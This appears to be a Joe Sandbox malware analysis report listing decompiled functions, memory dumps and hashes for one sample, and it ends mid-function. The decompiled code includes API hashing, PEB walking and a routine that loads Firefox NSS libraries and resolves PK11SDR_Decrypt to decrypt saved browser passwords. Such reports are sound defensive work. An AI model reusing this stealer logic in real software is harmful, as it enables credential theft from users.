                                      Function 012E9EC7, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: HeapProcess
                                      • String ID:
                                      • API String ID: 54951025-0
                                      • Opcode ID: 4f1bcc48a41739c4158508c3e832bb8a8c1e9c87b36af736844c836d6838a279
                                      • Instruction ID: 4804b343da0d960ea54a35839a96d1f65ffdeb9509002e30bc9bc6b0f47a5e8b
                                      • Opcode Fuzzy Hash: 4f1bcc48a41739c4158508c3e832bb8a8c1e9c87b36af736844c836d6838a279
                                      • Instruction Fuzzy Hash: D5A01130200200CFE3A28E32A28820E3AEEBA00380B00822AE000C8228EA2080808B22
                                      Uniqueness

                                      Uniqueness Score: 0.04%

                                      Function 012EE793, Relevance: .1, Instructions: 105COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f9a2e4514381f2c98331f7f9a6300ad5f7ffe56f27ec30d5408c386e67ef3ec6
                                      • Instruction ID: 8ef5ec8d0716a6cfc629b3f33b189117fa5ece88144d379c23ddf1f5d5ab9625
                                      • Opcode Fuzzy Hash: f9a2e4514381f2c98331f7f9a6300ad5f7ffe56f27ec30d5408c386e67ef3ec6
                                      • Instruction Fuzzy Hash: 3021B673F2043947770CC47E8C5627DB6E1C78C501745827AF9A6DA3C1E968D927E2E4
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 002454A9, Relevance: .1, Instructions: 93COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4f7567a5fbc2f57699485bbede3328af11860cad7103f0f8210cbd2d61708212
                                      • Instruction ID: a8195f962065177dcd8a3f0d387c672676246e6c9f0c4cfba0abd81a4f3c9dee
                                      • Opcode Fuzzy Hash: 4f7567a5fbc2f57699485bbede3328af11860cad7103f0f8210cbd2d61708212
                                      • Instruction Fuzzy Hash: 2A316F76E10A269FCB18CF58C4D09AEB7F6FF89314B6981A9D845E7312D730E951CB80
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 012EE666, Relevance: .1, Instructions: 86COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b95a732b3fb3eaa10f5a76d9721b95eed5fa6fad285a3fa41a0a47ba74ae8893
                                      • Instruction ID: 9a702cfd028054cb579218280f40e95ebf2cb404ac603a531a71d970fed33143
                                      • Opcode Fuzzy Hash: b95a732b3fb3eaa10f5a76d9721b95eed5fa6fad285a3fa41a0a47ba74ae8893
                                      • Instruction Fuzzy Hash: 5C11E763F308391B374CC52E8C9737962D1EB9C600347523EE966D62C0E464DA23D3D4
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 00230467, Relevance: .1, Instructions: 80COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                      • Instruction ID: ef87f59ae770f011246b8ab737e15c1a3422a86086a285ad5c0db3ce44d756f9
                                      • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                      • Instruction Fuzzy Hash: 1931D57661434A8FC710DF18D8D0A2AB7E4FF88304F4509ADE69587312D330F9168FA1
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 0025F9F3, Relevance: .1, Instructions: 63COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 83%
                                      			E0025F9F3(void* __ecx, signed int __edx, signed int* _a8) {
				void* _t12;
				signed int* _t24;
				void* _t25;
				signed int _t32;
				signed int _t34;
				signed int _t41;
				signed int _t42;
				signed int _t47;
				signed int _t48;
				signed char* _t51;

				_t32 = __edx;
				asm("cdq");
				_t41 = __edx & 0x00000003;
				_t42 = 0x10ad;
				_t47 = _t41 + __edx >> 2;
				_t51 = __ecx + _t47 * 4;
				_t48 =  ~_t47;
				if(_t41 != 0) {
					do {
						asm("rol eax, 0xf");
						asm("rol eax, 0xd");
						_t42 = ( *(_t51 + _t48 * 4) * 0xcc9e2d51 * 0x1b873593 ^ _t42) * 5 - 0x19ab949c;
						_t48 = _t48 + 1;
					} while (_t48 != 0);
				}
				_t34 = 0;
				_t12 = (_t32 & 0x00000003) - 1;
				if(_t12 == 0) {
					L7:
					asm("rol eax, 0xf");
					_t42 = _t42 ^ ( *_t51 & 0x000000ff ^ _t34) * 0xcc9e2d51 * 0x1b873593;
				} else {
					_t25 = _t12 - 1;
					if(_t25 == 0) {
						L6:
						_t34 = _t34 ^ (_t51[1] & 0x000000ff) << 0x00000008;
						goto L7;
					} else {
						if(_t25 == 1) {
							_t34 = (_t51[2] & 0x000000ff) << 0x10;
							goto L6;
						}
					}
				}
				_t24 = _a8;
				 *_t24 = (((_t42 ^ _t32) >> 0x00000010 ^ _t42 ^ _t32) * 0x85ebca6b >> 0x0000000d ^ ((_t42 ^ _t32) >> 0x00000010 ^ _t42 ^ _t32) * 0x85ebca6b) * 0xc2b2ae35 >> 0x00000010 ^ (((_t42 ^ _t32) >> 0x00000010 ^ _t42 ^ _t32) * 0x85ebca6b >> 0x0000000d ^ ((_t42 ^ _t32) >> 0x00000010 ^ _t42 ^ _t32) * 0x85ebca6b) * 0xc2b2ae35;
				return _t24;
			}













                                      0x0025f9f7
                                      0x0025f9fb
                                      0x0025f9fc
                                      0x0025fa04
                                      0x0025fa09
                                      0x0025fa0c
                                      0x0025fa0f
                                      0x0025fa11
                                      0x0025fa13
                                      0x0025fa1a
                                      0x0025fa25
                                      0x0025fa2b
                                      0x0025fa31
                                      0x0025fa31
                                      0x0025fa13
                                      0x0025fa38
                                      0x0025fa3d
                                      0x0025fa40
                                      0x0025fa5c
                                      0x0025fa67
                                      0x0025fa70
                                      0x0025fa42
                                      0x0025fa42
                                      0x0025fa45
                                      0x0025fa53
                                      0x0025fa5a
                                      0x00000000
                                      0x0025fa47
                                      0x0025fa4a
                                      0x0025fa50
                                      0x00000000
                                      0x0025fa50
                                      0x0025fa4a
                                      0x0025fa45
                                      0x0025fa98
                                      0x0025fa9b
                                      0x0025fa9e

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 940939e4bd13f0287124b6da9b8e99d7d471d9685142fc905d3a88637cfab6e7
                                      • Instruction ID: a4bccc093fe412ccc998576dfa7d5587005a179abc3908f4695368983f6791ce
                                      • Opcode Fuzzy Hash: 940939e4bd13f0287124b6da9b8e99d7d471d9685142fc905d3a88637cfab6e7
                                      • Instruction Fuzzy Hash: 1C116B327646120E972C9C3E4E17067FBCBD3C9111788983FE89FCB695E531E70A4681
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 0023F332, Relevance: .1, Instructions: 63COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 940939e4bd13f0287124b6da9b8e99d7d471d9685142fc905d3a88637cfab6e7
                                      • Instruction ID: 8ce96dce6e90a88764d313d431f505562f7dd03834a36a2627573c317ab8f54b
                                      • Opcode Fuzzy Hash: 940939e4bd13f0287124b6da9b8e99d7d471d9685142fc905d3a88637cfab6e7
                                      • Instruction Fuzzy Hash: 2511AB737246120A876C9C3E5E17067FBDBD3CD110B88887FE89BCB294E031E7064680
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 0024931C, Relevance: .0, Instructions: 44COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 52d6af32f81210a7d8c2339af9eb0079fa52d88a47775c7bbb03b4768aeb6e14
                                      • Instruction ID: e8d38c029954ac47de8f01644b4dc3be8838794209e633ec48294c2391d3f010
                                      • Opcode Fuzzy Hash: 52d6af32f81210a7d8c2339af9eb0079fa52d88a47775c7bbb03b4768aeb6e14
                                      • Instruction Fuzzy Hash: 1001BC7994C6C2EFC7268F349864043BFA46E8F32439E2AD9C5D08F0A3CA119482DB00
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 002492E7, Relevance: .0, Instructions: 43COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: de713413ae30e9bbd629b1ce9e9688af373d2f3a06129fa7c1a59eb67a33a478
                                      • Instruction ID: 93be0a32f1b9782e21af9b42a8026f320aac01d2704db4a7e69055d008637b17
                                      • Opcode Fuzzy Hash: de713413ae30e9bbd629b1ce9e9688af373d2f3a06129fa7c1a59eb67a33a478
                                      • Instruction Fuzzy Hash: 0A018F6955C6C2EFCB668F389864053BFF06E8F32439F2AD9C5D18F1A3C6119486DB01
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 012E943A, Relevance: .0, Instructions: 23COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 69b3ff5fd1344fc2f5de9ce969d2b5a23f5395e665722d9f0df2243ff16b4716
                                      • Instruction ID: 72901a49b0ea8c53153fec629e05dff80d155ab6bb7795e17528a847df607d4e
                                      • Opcode Fuzzy Hash: 69b3ff5fd1344fc2f5de9ce969d2b5a23f5395e665722d9f0df2243ff16b4716
                                      • Instruction Fuzzy Hash: 90E08C72925228EBCB24DBCCD9489AAF7ECEB09B10F55019BFA08D3201C270DE40C7D0
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 0025E5BE, Relevance: .0, Instructions: 20COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025E5BE() {
				intOrPtr* _t10;
				intOrPtr* _t11;

				_t10 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x14;
				_t11 =  *_t10;
				while(_t11 != _t10) {
					if(E0025E67C( *((intOrPtr*)(_t11 + 0x28))) == 0) {
						return  *((intOrPtr*)(_t11 + 0x10));
					}
					_t11 =  *_t11;
				}
				return 0;
			}





                                      0x0025e5c9
                                      0x0025e5cc
                                      0x0025e5de
                                      0x0025e5da
                                      0x00000000
                                      0x0025e5e7
                                      0x0025e5dc
                                      0x0025e5dc
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                      • Instruction ID: d46be2897f3072e7431122363642ca0a9bf9e38cace6f7c16b9369315cc50d46
                                      • Opcode Fuzzy Hash: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                      • Instruction Fuzzy Hash: 56E086332205508BCE25DF19D540915B3B5EB9037575B0465E84697501F730FE19CA54
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 0023DEFD, Relevance: .0, Instructions: 20COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                      • Instruction ID: 4169d3003cf2f98cfef0302d458381abee62581eda35f5034eab11b6608232c2
                                      • Opcode Fuzzy Hash: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                      • Instruction Fuzzy Hash: BFE08C722305118BC621DF19F880A12F3F4EF80370B2A0468E44793900C320FC21CA90
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 0025E8EC, Relevance: .0, Instructions: 11COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025E8EC() {
				intOrPtr _t4;

				_t4 =  *[fs:0x30];
				if(_t4 == 0) {
					return 0;
				} else {
					return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t4 + 0xc)) + 0xc)))))) + 0x18));
				}
			}




                                      0x0025e8ec
                                      0x0025e8f4
                                      0x0025e906
                                      0x0025e8f6
                                      0x0025e903
                                      0x0025e903

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                      • Instruction ID: e8c25eae13c9cde39ce6f2aaf1fa1cd4559556fc8d5f3d84713bd541d1dd9593
                                      • Opcode Fuzzy Hash: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                      • Instruction Fuzzy Hash: 3CD0EA783619418FCF55CF18C584E11B3E4EB49761B0A8491E905CB731D734ED00EA00
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 0023E22B, Relevance: .0, Instructions: 11COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                      • Instruction ID: 58b51ffb7b70b51da9df25a439d1039b2b520f06a3f14f6f3345fcc6506c51e3
                                      • Opcode Fuzzy Hash: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                      • Instruction Fuzzy Hash: F2D0EA787619418FCB51CF18C584E01B3E4EB49760B0A8491E905CB771D734ED00EA40
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 0025E5B7, Relevance: .0, Instructions: 2COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025E5B7() {

				return  *[fs:0x30];
			}



                                      0x0025e5bd

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                      • Instruction Fuzzy Hash:
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 0023DEF6, Relevance: .0, Instructions: 2COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                      • Instruction Fuzzy Hash:
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 0025A324, Relevance: 47.5, APIs: 10, Strings: 17, Instructions: 219libraryUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 98%
                                      			E0025A324(void* __ecx, void* __edx, WCHAR* _a4) {
				WCHAR* _v8;
				long _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				char _v24;
				char _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				short _v560;
				struct HINSTANCE__* _t135;
				WCHAR* _t158;
				intOrPtr _t194;
				void* _t206;
				void* _t216;
				void* _t218;

				_t206 = __edx;
				_t158 = 0;
				_t216 = __ecx;
				E00251052( &_v560, 0, 0x104);
				GetCurrentDirectoryW(0x104,  &_v560);
				SetCurrentDirectoryW(_a4);
				E00253297( &_a4, _t206, 0, "\\");
				E0025345A( &_v40,  &_a4);
				E00253297( &_v40, _t206, 0, L"nss3.dll");
				E0025345A( &_v20,  &_a4);
				E00253297( &_v20, _t206, 0, L"msvcr120.dll");
				E0025345A( &_v16,  &_a4);
				E00253297( &_v16, _t206, 0, L"msvcp120.dll");
				E0025345A( &_v36,  &_a4);
				E00253297( &_v36, _t206, 0, L"mozglue.dll");
				E0025345A( &_v32,  &_a4);
				E00253297( &_v32, _t206, 0, L"softokn3.dll");
				E0025345A( &_v28,  &_a4);
				E00253297( &_v28, _t206, 0, L"msvcp");
				E0025345A( &_v24,  &_a4);
				E00253297( &_v24, _t206, 0, L"msvcr");
				_t218 = 0x5a;
				_v12 = 0x104;
				while(1) {
					E0025345A( &_v8,  &_v28);
					E00253297(E0025309F( &_v8, _t206, 0, _v12), _t206, 0, L".dll");
					if(PathFileExistsW(_v8) != 0) {
						break;
					}
					_v12 = _v12 + 0xa;
					E00255A2D(_v8);
					_t224 = _v12 - 0x96;
					_v8 = _t158;
					if(_v12 != 0x96) {
						continue;
					} else {
						while(1) {
							L5:
							E0025345A( &_v8,  &_v24);
							E00253297(E0025309F( &_v8, _t206, _t224, _t218), _t206, _t224, L".dll");
							if(PathFileExistsW(_v8) != 0) {
								break;
							}
							_t218 = _t218 + 0xa;
							E00255A2D(_v8);
							_v8 = _t158;
							if(_t218 != 0x96) {
								continue;
							}
							L9:
							 *((intOrPtr*)(_t216 + 0xa8)) = LoadLibraryW(_v20);
							 *((intOrPtr*)(_t216 + 0xac)) = LoadLibraryW(_v16);
							 *((intOrPtr*)(_t216 + 0xb0)) = LoadLibraryW(_v36);
							 *((intOrPtr*)(_t216 + 0xb4)) = LoadLibraryW(_v40);
							_t135 = LoadLibraryW(_v32);
							 *(_t216 + 0xb8) = _t135;
							if( *((intOrPtr*)(_t216 + 0xac)) != _t158 &&  *((intOrPtr*)(_t216 + 0xb0)) != _t158) {
								_t194 =  *((intOrPtr*)(_t216 + 0xb4));
								if(_t194 != 0) {
									_t230 = _t135;
									if(_t135 != 0) {
										_push(_t194);
										 *((intOrPtr*)(_t216 + 0x68)) = E0025E907(_t194, "NSS_Init", _t230);
										 *((intOrPtr*)(_t216 + 0x80)) = E0025E907( *((intOrPtr*)(_t216 + 0xb4)), "PK11_GetInternalKeySlot", _t230);
										 *((intOrPtr*)(_t216 + 0x7c)) = E0025E907( *((intOrPtr*)(_t216 + 0xb4)), "PK11_Authenticate", _t230);
										 *((intOrPtr*)(_t216 + 0x70)) = E0025E907( *((intOrPtr*)(_t216 + 0xb4)), "PK11SDR_Decrypt", _t230);
										 *((intOrPtr*)(_t216 + 0x74)) = E0025E907( *((intOrPtr*)(_t216 + 0xb4)), "NSSBase64_DecodeBuffer", _t230);
										 *((intOrPtr*)(_t216 + 0x78)) = E0025E907( *((intOrPtr*)(_t216 + 0xb4)), "PK11_CheckUserPassword", _t230);
										 *((intOrPtr*)(_t216 + 0x6c)) = E0025E907( *((intOrPtr*)(_t216 + 0xb4)), "NSS_Shutdown", _t230);
										 *((intOrPtr*)(_t216 + 0x84)) = E0025E907( *((intOrPtr*)(_t216 + 0xb4)), "PK11_FreeSlot", _t230);
										 *((intOrPtr*)(_t216 + 0x88)) = E0025E907( *((intOrPtr*)(_t216 + 0xb4)), "PR_GetError", _t230);
										SetCurrentDirectoryW( &_v560);
										_t158 = 1;
									}
								}
							}
